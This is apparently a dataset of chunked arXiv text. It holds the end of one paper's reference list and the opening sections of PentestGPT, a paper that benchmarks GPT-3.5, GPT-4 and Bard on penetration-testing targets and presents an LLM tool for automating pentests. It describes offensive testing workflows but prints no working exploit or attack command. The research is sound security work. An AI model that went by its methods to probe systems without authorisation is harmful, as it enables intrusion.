2308.06921#65 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | "It's Weird That it Knows What I Want": Usability and Interactions with Copilot for Novice Programmers. arXiv:2304.02491 [cs.HC] [29] Margot Rutgers. 2021. Duckbot: A chatbot to assist students in programming tutorials. Master's thesis. University of Twente. [30] Sami Sarsa, Paul Denny, Arto Hellas, and Juho Leinonen. 2022. | 2308.06921#64 | 2308.06921#66 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#66 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Automatic Generation of Programming Exercises and Code Explanations Using Large Language Models. In Proceedings of the 2022 ACM Conference on International Computing Education Research V.1. ACM, Lugano and Virtual Event Switzerland, 27-43. https://doi.org/10.1145/3501385.3543957 [31] Jaromir Savelka, Arav Agarwal, Marshall An, Chris Bogart, and Majd Sakr. 2023. Thrilled by Your Progress! Large Language Models (GPT-4) No Longer Struggle to Pass Assessments in Higher Education Programming Course. In Proceedings of the 2023 ACM Conference on International Computing Education Research V.1. ACM. [32] Jaromir Savelka, Arav Agarwal, Christopher Bogart, and Majd Sakr. 2023. | 2308.06921#65 | 2308.06921#67 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#67 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Large Language Models (GPT) Struggle to Answer Multiple-Choice Questions about Code. arXiv:2303.08033 [cs.CL] [33] Haoye Tian, Weiqi Lu, Tsz On Li, Xunzhu Tang, Shing-Chi Cheung, Jacques Klein, and Tegawendé F. Bissyandé. 2023. Is ChatGPT the Ultimate Programming Assistant - How far is it? arXiv:2304.11938 [cs.SE] [34] James Walden, Nicholas Caporusso, and Ludiana Atnafu. 2022. A Chatbot for Teaching Secure Programming. In Proceedings of the EDSIG Conference ISSN, Vol. 2473. 4901. [35] Jason Wei, Xuezhi Wang, Dale Schuurmans, Maarten Bosma, Brian Ichter, Fei Xia, Ed Chi, Quoc Le, and Denny Zhou. 2023. Chain-of-Thought Prompting Elicits Reasoning in Large Language Models. arXiv:2201.11903 [cs.CL] [36] Laura Weidinger, Jonathan Uesato, Maribeth Rauh, Conor Griffin, Po-Sen Huang, John Mellor, Amelia Glaese, Myra Cheng, Borja Balle, Atoosa Kasirzadeh, Courtney Biles, Sasha Brown, Zac Kenton, Will Hawkins, Tom Stepleton, Abeba Birhane, Lisa Anne Hendricks, Laura Rimell, William Isaac, Julia Haas, Sean Legassick, Geoffrey Irving, and Iason Gabriel. 2022. Taxonomy of Risks Posed by Language Models. In 2022 ACM Conference on Fairness, Accountability, and Transparency (Seoul, Republic of Korea) (FAccT '22). Association for Computing Machinery, New York, NY, USA, 214-229. https://doi.org/10.1145/3531146.3533088 [37] Terry Yue Zhuo, Yujin Huang, Chunyang Chen, and Zhenchang Xing. 2023. | 2308.06921#66 | 2308.06921#68 | 2308.06921 | [
"2304.03938"
]
|
|
2308.06782#0 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | arXiv:2308.06782v1 [cs.SE] 13 Aug 2023 # PENTESTGPT: An LLM-empowered Automatic Penetration Testing Tool Gelei Deng1, Yi Liu1, Víctor Mayoral-Vilches2,3, Peng Liu4, Yuekang Li5, Yuan Xu1, Tianwei Zhang1, Yang Liu1, Martin Pinzger2, and Stefan Rass6 1Nanyang Technological University, 2Alpen-Adria-Universität Klagenfurt, 3Alias Robotics, 4Institute for Infocomm Research, A*STAR, 5University of New South Wales, 6Johannes Kepler University Linz {gelei.deng, yi009, xu.yuan, tianwei.zhang, yangliu}@ntu.edu.sg, [email protected], [email protected], [email protected], [email protected] | 2308.06782#1 | 2308.06782 | [
"2305.13860"
]
|
|
2308.06782#1 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Abstract: Penetration testing, a crucial industrial practice for ensuring system security, has traditionally resisted automation due to the extensive expertise required by human professionals. Large Language Models (LLMs) have shown significant advancements in various domains, and their emergent abilities suggest their potential to revolutionize industries. In this research, we evaluate the performance of LLMs on real-world penetration testing tasks using a robust benchmark created from test machines with platforms. Our findings reveal that while LLMs demonstrate proficiency in specific sub-tasks within the penetration testing process, such as using testing tools, interpreting outputs, and proposing subsequent actions, they also encounter difficulties maintaining an integrated understanding of the overall testing scenario. In response to these insights, we introduce PENTESTGPT, an LLM-empowered automatic penetration testing tool that leverages the abundant domain knowledge inherent in LLMs. PENTESTGPT is meticulously designed with three self-interacting modules, each addressing individual sub-tasks of penetration testing, to mitigate the challenges related to context loss. Our evaluation shows that PENTESTGPT not only outperforms LLMs with a task-completion increase of 228.6% compared to the GPT-3.5 model among the benchmark targets but also proves effective in tackling real-world penetration testing challenges. Having been open-sourced on GitHub, PENTESTGPT has garnered over 4,700 stars and fostered active community engagement, attesting to its value and impact in both the academic and industrial spheres. | 2308.06782#0 | 2308.06782#2 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#2 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Index Terms: security, offensive, cybersecurity, pentesting # 1. Introduction attempt breaches of an organization's defenses to uncover vulnerabilities. They offer marked advantages over traditional defensive mechanisms, reliant on incomplete system knowledge and modeling. Guided by the principle "the best defense is a good offense", this study focuses on offensive strategies, particularly penetration testing. Penetration testing [2] is a proactive offensive technique aiming at identifying, assessing, and mitigating as many security vulnerabilities as possible. This involves executing targeted attacks to confirm diverse flaws (e.g., erratic behaviors) and is efficacious in creating a comprehensive inventory of vulnerabilities complemented by actionable enhancement recommendations. As a widely-employed practice for security appraisal, penetration testing empowers organizations to discern and neutralize potential vulnerabilities in their networks and systems before exploitation by malicious entities. Despite its significance, the industry often leans on manual techniques and specialized knowledge [3], making it labor-intensive. This has generated a gap in responding to the escalating demand for adept and efficient security evaluations. | 2308.06782#1 | 2308.06782#3 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#3 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Recently Large Language Models (LLMs) [4], [5] are making striking progress, exhibiting an increasingly nuanced understanding of human-like text and effectively executing various tasks across diverse domains. One intriguing aspect of LLMs is their emergent abilities [6], which are not explicitly programmed but arise during the training process. These abilities enable LLMs to perform complex tasks such as reasoning, summarization, question-answering, and domain-specific problem-solving without requiring specialized training. Such capabilities indicate the transformative potential of LLMs across various sectors, including cybersecurity. A critical question thus emerges: can LLMs be leveraged in cybersecurity, particularly for performing automated penetration testing? Guaranteeing a system's immunity to potential attacks is a formidable challenge. Offensive security methods, such as penetration testing (pen-testing) or red teaming, have become essential in the security lifecycle. As detailed by Applebaum [1], these methods require security teams to | 2308.06782#2 | 2308.06782#4 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#4 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | to evaluate the capabilities of LLMs on real-world penetration testing tasks. Unfortunately, the current benchmarks for penetration testing [7], [8] are not comprehensive and fail to assess | 2308.06782#3 | 2308.06782#5 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#5 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 1 diagram: component labels include User, Target, exploit flow, graph, adapters, models, state, parsing, reasoning, generation, goal description, exploit tree exchange, benchmarks, external entities, and the numbered components 1. ExploitFlow, 2. PentestGPT, 3. PentestPerf, and 4. Malism; the legend distinguishes this paper from other/future papers and inner components.] Figure 1: Architecture of our framework to develop fully automated penetration testing tools, MALISM. The figure depicts the various interaction flows that an arbitrary User could follow using MALISM to pentest a given Target. 1. Corresponds with EXPLOITFLOW, a modular library to produce security exploitation routes (exploit flows) that captures the state of the system being tested in a flow after every discrete action. 2. (this paper) Corresponds with PENTESTGPT, a testing tool that leverages the power of LLMs to produce testing guidance (heuristics) for every given discrete state. 3. PENTESTPERF is a comprehensive penetration testing benchmark to evaluate the performances of penetration testers and automated tools across a wide array of testing targets. 4. captures MALISM, our framework to develop fully automated penetration testing tools which we name cybersecurity cognitive engines. | 2308.06782#4 | 2308.06782#6 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#6 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | progressive accomplishments fairly during the process. To address this limitation, we construct a robust benchmark that includes test machines from HackTheBox [9] and VulnHub [10], two leading platforms for penetration testing challenges. Comprising 13 targets with 182 sub-tasks, our benchmark encompasses all vulnerabilities appearing in OWASP's top 10 vulnerability list [11]. Also, it offers a more detailed evaluation of the tester's performance by monitoring the completion status for each sub-task. | 2308.06782#5 | 2308.06782#7 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#7 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Armed with this benchmark, we conduct an exploratory study using GPT-3.5 [12], GPT-4 [13], and Bard [14] as representative LLMs. We interactively test these models by guiding them to complete the penetration tasks against our benchmark targets. This interaction involves setting a penetration testing goal for the LLM, soliciting it for the appropriate operation to execute, implementing it in the testing environment, and feeding the test outputs back to the LLM for next-step reasoning (Figure 2). By repeating this cycle, we derive the final penetration testing results. To evaluate the performance of the LLMs, we compare their results against baseline solutions provided by official walkthroughs and solutions from certified penetration testers. By analyzing similarities and differences in their problem-solving approaches, we aim to better understand LLMs' penetration testing capabilities and discern how their problem-solving strategies diverge from those of human | 2308.06782#6 | 2308.06782#8 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#8 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | experts. Our investigation yields intriguing insights into the capabilities and limitations of LLMs in penetration testing. We discover that LLMs demonstrate proficiency in managing specific sub-tasks within the testing process, such as utilizing testing tools, interpreting their outputs, and suggesting subsequent actions. Compared to human experts, LLMs are especially adept at executing complex commands and options with testing tools, while models like GPT-4 excel in comprehending source code and pinpointing vulnerabilities. Furthermore, LLMs can craft appropriate test commands and accurately describe graphical user-interface operations needed for specific tasks. Leveraging their vast knowledge base, they can design inventive testing procedures to unveil potential vulnerabilities in real-world systems and CTF challenges. However, we also note that LLMs have difficulty in maintaining a coherent grasp of the overarching testing scenario, a vital aspect for attaining the testing goal. As the dialogue advances, they may lose sight of earlier discoveries and struggle to apply their reasoning consistently toward the final objective. Additionally, LLMs might overemphasize recent tasks in the conversation history, regardless of their vulnerability status. As a result, they tend to neglect other potential attack surfaces exposed in prior tests and fail to complete the penetration testing task. The outcomes of our empirical study are promising, re- | 2308.06782#7 | 2308.06782#9 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#9 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | vealing that LLMs possess the necessary domain knowledge to perform penetration testing tasks. In particular, they are great at providing an intuition of what to do in a given networking scenario. However, what they lack is effective guidance to carry out these tasks independently and maintain a cohesive grasp of the testing scenario. On the other hand, as investigated in a prior research publication [] focused on capturing the exploitation route (or flow) for automation. Given the complexity of the (network) state space, the state itself is not enough to reason about what are the best actions to pentest. It rapidly becomes evident that a heuristic is needed to support autonomous pentesting which helps pick actions to achieve given goals. With this understanding, we aim to contribute to unlocking the potential of modern machine learning approaches and develop a fully automated penetration testing framework that helps produce cybersecurity cognitive engines. Our overall architecture is depicted in Figure 1, which shows our current work so far and near future planned contributions. Our proposed framework, MALISM, is designed to enable a user without in-depth security domain knowledge to produce its own cybersecurity cognitive engine that helps conduct penetration testing over an extensive range of targets. This framework comprises three primary components: 1) EXPLOITFLOW []: A modular library to produce cyber security exploitation routes (exploit flows). EXPLOITFLOW aims to combine and compose exploits from different sources and frameworks, capturing the state of the system being tested in a flow after every discrete action which allows learning attack trees that affect a given system. EXPLOITFLOW's main motivation is to facilitate and empower Game Theory and Artificial Intelligence (AI) research in cyber security. It provides a unique representation of the exploitation process that encodes every facet within it. Its representation can be effectively integrated with various penetration testing tools and scripts, such as Metasploit [15] to perform end-to-end penetration testing. Such representation can be further visualized to guide the human experts for the reproduction of the testing process. 2) PENTESTGPT (this paper): An automated penetration testing system that leverages the power of LLMs to produce testing guidance and intuition at every given discrete state. It functions as the core component of the MALISM framework, guiding the LLMs to efficiently utilize their domain knowledge in real-world testing scenarios. 3) PENTESTPERF: A comprehensive penetration testing benchmark developed to evaluate the performances of penetration testers and automated tools across a wide array of testing targets. It offers a fair and robust platform for performance comparison. The harmonious integration of these three components forms an automated, self-evolving penetration testing framework capable of executing penetration tests over various targets, MALISM. This framework to develop fully automated penetration testing tools, which we name cyberse- | 2308.06782#8 | 2308.06782#10 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#10 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | curity cognitive engines, aims to revolutionize the field of penetration testing by significantly reducing the need for domain expertise and enabling more comprehensive and reliable testing. Building on our insights into LLMs' capabilities in penetration testing, we present PENTESTGPT, an interactive system designed to enhance the application of LLMs in this domain. Drawing inspiration from the collaborative dynamics commonly observed in real-world human penetration testing teams, PENTESTGPT is particularly tailored to manage large and intricate projects. It features a tripartite architecture comprising Reasoning, Generation, and Parsing Modules, each reflecting specific roles within penetration testing teams. The Reasoning Module emulates the function of a lead tester, focusing on maintaining a high-level overview of the penetration testing status. We introduce a novel representation, the Pentesting Task Tree (PTT), based on the cybersecurity attack tree [16]. This structure encodes the testing process' | 2308.06782#9 | 2308.06782#11 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#11 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | s ongoing status and steers subsequent actions. Uniquely, this representation can be translated into natural language and interpreted by the LLM, thereby comprehended by the Generation Module and directing the testing procedure. The Generation Module, mirroring a junior tester's role, is responsible for constructing detailed procedures for specific sub-tasks. Translating these into exact testing operations augments the generation process's accuracy. Meanwhile, the Parsing Module deals with diverse text data encountered during penetration testing, such as tool outputs, source codes, and HTTP web pages. It condenses and emphasizes these texts, extracting essential information. Collectively, these modules function as an integrated system. PENTESTGPT completes a complex penetration testing task by bridging high-level strategies with precise execution and intelligent data interpretation, thereby maintaining a coherent and effective testing process. We evaluate PENTESTGPT using our benchmark to showcase its efficacy. Specifically, our system achieves remarkable performance gains, with 228.6% and 58.6% increases in sub-task completion compared to the direct usage of GPT-3.5 and GPT-4, respectively. We also apply PENTESTGPT to the HackTheBox active penetration testing machines challenge [17], completing 4 out of the 10 selected targets at a total OpenAI API cost of 131.5 US Dollars, ranking among the top 1% players in a community of over 670,000 members. This evaluation underscores PENTESTGPT's practical value in enhancing penetration testing tasks' efficiency and precision. The solution has been made publicly available on GitHub1, receiving widespread acclaim with over 4,700 stars to the date of writing, active community engagement, and ongoing collaboration with multiple industrial partners. In summary, we make the following contributions: • Development of a Comprehensive Penetration Testing Benchmark. We craft a robust and representative penetration testing benchmark, encompassing a multitude of test | 2308.06782#10 | 2308.06782#12 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#12 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | (Footnote 1: For anonymity during the review process, we have created an anonymous repository to open-source our solution [18].) machines from leading platforms such as HackTheBox and VulnHub. This benchmark includes 182 sub-tasks covering OWASP's top 10 vulnerabilities, offering a fair and comprehensive evaluation of penetration testing. • Empirical Evaluation of LLMs for Penetration Testing Tasks. By employing models like GPT-3.5, GPT-4, and Bard, our exploratory study rigorously investigates the strengths and limitations of LLMs in penetration testing. The insights gleaned from this analysis shed valuable light on the capabilities and challenges faced by LLMs, enriching our understanding of their applicability in this specialized domain. | 2308.06782#11 | 2308.06782#13 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#13 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | • Development of an Innovative LLM-powered Penetration Testing System. We engineer PENTESTGPT, a novel interactive system that leverages the strengths of LLMs to carry out penetration testing tasks automatically. Drawing inspiration from real-world human penetration testing teams, PENTESTGPT integrates a tripartite design that mirrors the collaborative dynamics between senior and junior testers. This architecture optimizes LLMs' usage, significantly enhancing the efficiency and effectiveness of automated penetration testing. | 2308.06782#12 | 2308.06782#14 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#14 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 2. Background & Related Work # 2.1. Penetration Testing Penetration testing, or "pentesting", is a critical practice to enhance organizational systems' security. In a typical penetration test, security professionals, known as penetration testers, analyze the target system, often leveraging automated tools. The standard process is divided into five phases [19]: Reconnaissance, Scanning, Vulnerability Assessment, Exploitation, and Post Exploitation (including reporting). These phases enable testers to understand the target system, identify vulnerabilities, and exploit them to gain access. Despite substantial efforts [8], [20], [21] in the field, a fully automated penetration testing pipeline remains elusive. The challenges in automating the process arise from the comprehensive knowledge needed to understand and manipulate various vulnerabilities and the demand for a strategic plan to guide subsequent actions. In practice, penetration testers often use a combined approach integrating depth-first and breadth-first search techniques [19]. They begin by obtaining an overarching understanding of the target environment (utilizing a breadth-first approach) before focusing on specific services and vulnerabilities (employing a depth-first approach). This strategy ensures a thorough system analysis while prioritizing promising attack vectors, relying heavily on individual experience and domain expertise. Additionally, penetration testing requires many specialized tools with unique features and functions. This diversity adds complexity to the automation process. Therefore, even with the support of artificial intelligence, creating a fully unified solution for automated penetration testing remains a formidable challenge. | 2308.06782#13 | 2308.06782#15 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#15 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 2.2. Large Language Models Large Language Models (LLMs), including OpenAI's GPT-3.5 and GPT-4, are prominent tools with applications extending to various cybersecurity-related fields, such as code analysis [22] and vulnerability repair [23]. These models are equipped with wide-ranging general knowledge and the capacity for elementary reasoning. They can comprehend, infer, and produce text resembling human communication, aided by a training corpus encompassing diverse domains like computer science and cybersecurity. Their ability to interpret context and recognize patterns enables them to adapt knowledge to new scenarios. This adaptability, coupled with their proficiency in interacting with systems in a human-like way, positions them as valuable assets in enhancing penetration testing processes. Despite inherent limitations, LLMs offer distinct attributes that can substantially aid in the automation and improvement of penetration testing tasks. The realization of this potential, however, requires the creation and application of a specialized and rigorous benchmark. | 2308.06782#14 | 2308.06782#16 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#16 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 3. Penetration Testing Benchmark # 3.1. Motivation The fair evaluation of Large Language Models (LLMs) in penetration testing necessitates a robust and representative benchmark. Existing benchmarks in this domain [7], [8] have several limitations. First, they are often restricted in scope, focusing on a narrow range of potential vulnerabilities, and thus fail to capture the complexity and diversity of real-world cyber threats. For instance, the OWASP benchmark juiceshop [24] is commonly adopted for evaluating web vulnerability testing. However, it does not cover privilege escalation, which is an essential aspect of penetration testing. Second, existing benchmarks may not recognize the cumulative value of progress through the different stages of penetration testing, as they tend to evaluate only the final exploitation success. This approach overlooks the nuanced value each step contributes to the overall process, resulting in metrics that might not accurately represent actual performance in real-world scenarios. To address these concerns, we propose the construction of a comprehensive penetration testing benchmark that meets the following criteria: | 2308.06782#15 | 2308.06782#17 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#17 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Task Variety. The benchmark must encompass diverse tasks, reflecting various operating systems and emulating the diversity of scenarios encountered in real-world penetration testing. Challenge Levels. To ensure broad applicability, the bench- mark must include tasks of varying difficulty levels suitable for challenging novice and expert testers. Progress Tracking. Beyond mere success or failure met- rics, the benchmark must facilitate tracking of incremental progress, thereby recognizing and scoring the value added at each stage of the penetration testing process. # 3.2. Benchmark Design Following the criteria outlined previously, we develop a comprehensive benchmark that closely reflects real-world penetration testing tasks. The design process progresses through several stages. Task Selection. Our first step is to meticulously select tasks from HackTheBox [9] (HTB) and VulnHub [10]. These platforms are widely recognized and frequently utilized for penetration testing practice. Our selection process is guided by a desire to incorporate a diverse and challenging set of tasks. Capture The Flag (CTF) exercises and real-world testing scenarios have been included. The targets are drawn from various operating systems and encompass a broad spectrum of vulnerabilities. This approach ensures a wide representation of real-world penetration testing tasks. To account for different skill levels, the selected tasks cover a broad range of difficulty. While HTB and VulnHub offer reference difficulty levels, we further validate these with input from three certified penetration testers2, including the authors of this work. This collaborative process yields a consensus on the final difficulty rating for each target, align- ing with the conventional categorization [10] of penetration testing machines into easy, medium, and hard levels. It is worth noting that our benchmark does not explicitly include benign targets for evaluating false positives. This is because the iterative and exploratory nature of penetration testing inherently involves investigating services within the target that may ultimately be deemed benign. In this process, our primary focus is successfully identifying genuine vulnera- bilities. | 2308.06782#16 | 2308.06782#18 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#18 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Task Decomposition. We further parse the testing process of each target into a series of sub-tasks, following the standard solution commonly referred to as the "walkthrough" in penetration testing. Each sub-task corresponds to a unique step in the overall process. Specifically, a sub-task may represent a micro-step involving the use of a particular penetration testing tool (e.g., performing port scanning with nmap [25]) or exploiting a unique vulnerability identified in the Common Weakness Enumeration (CWE) [26] (e.g., exploiting SQL injection). To standardize decomposition, we arrange the sub-tasks into a two-layer structure. Initially, we categorize each sub-task according to the five phases of penetration testing, as described in Section 2. Then, we label the sub-task with either the corresponding CWE item it targets or the specific tools employed. These two steps enable us to formulate an exhaustive list of sub-tasks for every benchmark target. We include this list in Appendix 6, and the complete sub-task information is accessible on our anonymous open-source project [18]. Benchmark Validation. The final stage of our benchmark development involves rigorous validation. This step ensures that our benchmark accurately reflects real-world penetration testing scenarios and offers reproducibility. During validation, three certified penetration testers independently attempt the penetration testing targets, refining the sub-tasks as needed. (Footnote 2: Our penetration testers are all Offensive Security Certified Professionals (OSCP).) We adjust our task decomposition accordingly because some targets may have multiple valid solutions. By the end, we compile a benchmark of 13 penetration testing targets with 182 sub-tasks in 25 categories. The benchmark includes all types of vulnerabilities as listed in the OWASP [11] Top 10 Project. Detailed information on the included categories is listed in the Appendix Section 6. To contribute to community development, we have made this benchmark publicly available online at our anonymous project website [18]. # 4. Exploratory Study We conduct an exploratory study to assess the capabilities of LLMs in penetration testing. Our primary objective is determining how well LLMs can adapt to the real-world complexities and challenges associated with penetration testing tasks. Specifically, we aim to address the following two research questions: RQ1 (Capability): To what extent can LLMs perform penetration testing tasks? RQ2 (Comparative Analysis): | 2308.06782#17 | 2308.06782#19 | 2308.06782 | [
"2305.13860"
]
|
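To make the two-layer labelling above concrete, the sketch below shows one way a benchmark sub-task could be recorded in Python (the language PentestGPT itself is written in). The field names and the example entries are illustrative assumptions, not the actual benchmark schema.

    from dataclasses import dataclass

    # Hypothetical record for one benchmark sub-task: the first layer is the
    # penetration-testing phase, the second layer is either a CWE item or a tool.
    @dataclass
    class SubTask:
        target: str       # benchmark machine, e.g. an HTB or VulnHub box
        phase: str        # Reconnaissance, Scanning, Vulnerability Assessment,
                          # Exploitation, or Post Exploitation
        label: str        # CWE identifier or tool name
        description: str  # human-readable step from the walkthrough

    examples = [
        SubTask("ExampleBox", "Scanning", "nmap", "Port-scan the target host"),
        SubTask("ExampleBox", "Exploitation", "CWE-89", "Exploit SQL injection in the login form"),
    ]
    print(len(examples), "sub-tasks recorded for", examples[0].target)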
2308.06782#19 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | How do the problem-solving strategies of human penetration testers and LLMs differ? We utilize the benchmark described in Section 3 to evaluate the performance of LLMs on penetration testing tasks. In the following, we first delineate our testing strategy for this study. Subsequently, we present the testing results and an analytical discussion to address the above research questions. # 4.1. Testing Strategy LLMs cannot perform penetration tests directly. Their capabilities are primarily text-based, responding to queries and providing suggestions. However, penetration testing often involves operations with user interfaces (UI) and understanding graphical information, such as website images. This necessitates a bridge between the test machine and the LLM to facilitate task completion. We introduce an interactive loop structure to evaluate the LLM's abilities in penetration testing within our benchmark. This process, depicted in Figure 2, consists of the following stages: ❶ We present the target information to the LLM and request recommendations for penetration testing actions. This initiates a looped testing procedure. ❷ We implement the actions suggested by the LLM, which encompass both terminal commands and graphical interactions. ❸ We gather the results of the actions. Text-based output, such as terminal responses or source code, is recorded directly. Human penetration testers provide concise summaries and descriptions for non-textual results (e.g., images). The summarized information is returned to the LLM to inform subsequent actions. ❹ This cycle continues until we identify a solution or reach a standstill. We compile a record of the testing procedures, encompassing successful tasks, ineffective actions, and any reasons for failure, if applicable. TABLE 1: Overall performance of LLMs on Penetration Testing Benchmark. | 2308.06782#18 | 2308.06782#20 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#20 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Benchmark composition: Easy has 7 targets with 77 sub-tasks, Medium has 4 targets with 71 sub-tasks, Hard has 2 targets with 34 sub-tasks, for 13 targets with 182 sub-tasks in total. GPT-3.5: Easy 1 target (14.29%) and 24 sub-tasks (31.17%); Medium 0 (0.00%) and 13 (18.31%); Hard 0 (0.00%) and 5 (14.71%); Average 1 target (7.69%) and 42 sub-tasks (23.07%). GPT-4: Easy 4 (57.14%) and 52 (67.53%); Medium 1 (25.00%) and 27 (38.03%); Hard 0 (0.00%) and 8 (23.53%); Average 5 (38.46%) and 87 (47.80%). Bard: Easy 2 (28.57%) and 29 (37.66%); Medium 0 (0.00%) and 16 (22.54%); Hard 0 (0.00%) and 5 (14.71%); Average 2 (15.38%) and 50 (27.47%). Model average: Easy 2.3 (33.33%) and 35 (45.45%); Medium 0.33 (8.33%) and 18.7 (26.29%); Hard 0 (0.00%) and 6 (17.64%); Overall 2.7 (20.5%) and 59.7 (32.78%). [Figure 2 (figure content): the human expert relays information between the LLM and the testing environment until the penetration testing goal, the flag, and the conclusion are obtained.] Figure 2: Overview of strategy to use LLMs for penetration testing. Automated vulnerability scanners such as Nexus [30] and OpenVAS [31] are excluded; consequently, we explicitly instruct the LLMs to refrain from using these tools. However, we follow the LLMs' recommendations for utilizing other tools designed to validate specific vulnerability types (e.g., sqlmap [32] for SQL injections). Occasionally, versioning discrepancies may lead the LLMs to provide incorrect instructions for tool usage. In such instances, our penetration testing experts evaluate whether the instructions would have been valid for a previous version of the tool. They then make any necessary adjustments to ensure the tool's correct operation. # 4.2. Evaluation Settings # 4.3. Capability Evaluation (RQ1) | 2308.06782#19 | 2308.06782#21 | 2308.06782 | [
"2305.13860"
]
|
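The looped procedure of Section 4.1 (stages ❶ through ❹) can be summarised by the sketch below. The functions ask_llm and execute_and_summarize are placeholders standing in for the chatbot interface and the human tester who runs each suggested action; the stopping test is likewise an assumption for illustration.

    def evaluation_loop(target_info, ask_llm, execute_and_summarize, max_rounds=50):
        """Drive an LLM through a penetration test via an interactive loop.

        ask_llm(prompt) -> str: sends a prompt to the chatbot and returns its reply.
        execute_and_summarize(action) -> str: the human tester performs the suggested
            action and returns a textual summary (terminal output, or a description
            of graphical results such as screenshots).
        """
        history = []
        # Stage 1: present target information and ask for the first action.
        reply = ask_llm(f"Target information:\n{target_info}\n"
                        "Suggest the next penetration testing action.")
        for _ in range(max_rounds):
            # Stages 2 and 3: execute the action and collect/summarize the results.
            result = execute_and_summarize(reply)
            history.append((reply, result))
            # Stage 4: stop when a solution is found or the test reaches a standstill.
            if "flag obtained" in result.lower() or "standstill" in result.lower():
                break
            reply = ask_llm(f"Result of the previous action:\n{result}\n"
                            "Suggest the next penetration testing action.")
        return history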
2308.06782#21 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | We proceed to assess the performances of various LLMs in penetration testing tasks using the strategy mentioned above. Model Selection. Our study focuses on three cutting-edge LLMs that are currently accessible: GPT-3.5 and GPT-4 from OpenAI and LaMDA [27] from Google. These models are selected based on their prominence in the research com- munity and consistent availability. To interact with the LLMs mentioned above, we utilize chatbot services provided by OpenAI and Google, namely ChatGPT [28] and Bard [14]. For this paper, the terms GPT-3.5, GPT-4, and Bard will represent these three LLMs. | 2308.06782#20 | 2308.06782#22 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#22 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Experimental Setup. We conduct our experiments in a local environment where the target and testing machines are part of the same private network. The testing machine operates on Kali Linux [29], version 2023.1. Several measures are implemented to validate the effectiveness of our testing procedures. First, we repeat the tests to account for inherent variability in the LLM outputs. In particular, we test each target with each LLM five times. We performed 195 tests in total, i.e., 5 repetitions * 3 models * 13 targets. In this process, a sub-task is considered successful if it succeeds in at least one trial, and a penetration task is considered successful as long as one trial succeeds. | 2308.06782#21 | 2308.06782#23 | 2308.06782 | [
"2305.13860"
]
|
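Under the success criterion stated in the experimental setup above, a sub-task counts as completed if it succeeds in at least one of the repeated trials, and a target counts as solved if any trial solves it. The aggregation is a simple union and any-check over repetitions, as the sketch below illustrates with made-up trial data.

    # Made-up trial data: for one (model, target) pair, each entry is the set of
    # sub-tasks completed in one of the five repeated trials.
    trials = [
        {"port scanning"},
        {"port scanning", "web enumeration"},
        set(),
        {"port scanning", "web enumeration", "privilege escalation"},
        set(),
    ]

    def completed_subtasks(trial_results):
        """A sub-task is successful if it succeeds in at least one trial."""
        completed = set()
        for result in trial_results:
            completed |= result
        return completed

    def target_solved(trial_results, final_step="privilege escalation"):
        """A target is successful as long as one trial reaches the final step."""
        return any(final_step in result for result in trial_results)

    print(sorted(completed_subtasks(trials)))   # union over the five repetitions
    print(target_solved(trials))                # True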
2308.06782#23 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Second, we make the best efforts to translate UI operations and graphical information into natural languages accurately. In addition, we ensure the precise execution of the instructions provided by the LLMs. Third, we maintain the integrity of the testing process by strictly limiting the testerâ s role to executing actions and reporting results without adding expert knowl- edge or guidance. Finally, the testing and target machines are rebooted after each test to reset their states, ensuring a consistent starting point for each test. Tool Usage. Our study aims to assess the innate capabilities of LLMs without reliance on automated vulnerability scan- To study RQ1, we begin by assessing the overall perfor- mance of three prominent LLMs: GPT-4, Bard, and GPT- 3.5. The results of these evaluations are compiled in Table 1. The experimental results show that the three LLMs com- pleted at least one end-to-end penetration testing task. This achievement underscores their ability to conduct a broad spectrum of testing operations, particularly within environ- ments of less complexity. Among the models, GPT-4 stands out with superior performance, achieving success with 4 targets of easy difficulty and 1 of medium difficulty. Bard and GPT-3.5 also demonstrate commendable capabilities, completing 2 and 1 targets of easy difficulty, respectively. When examining sub-tasks, GPT-4 accomplishes 52 of 77 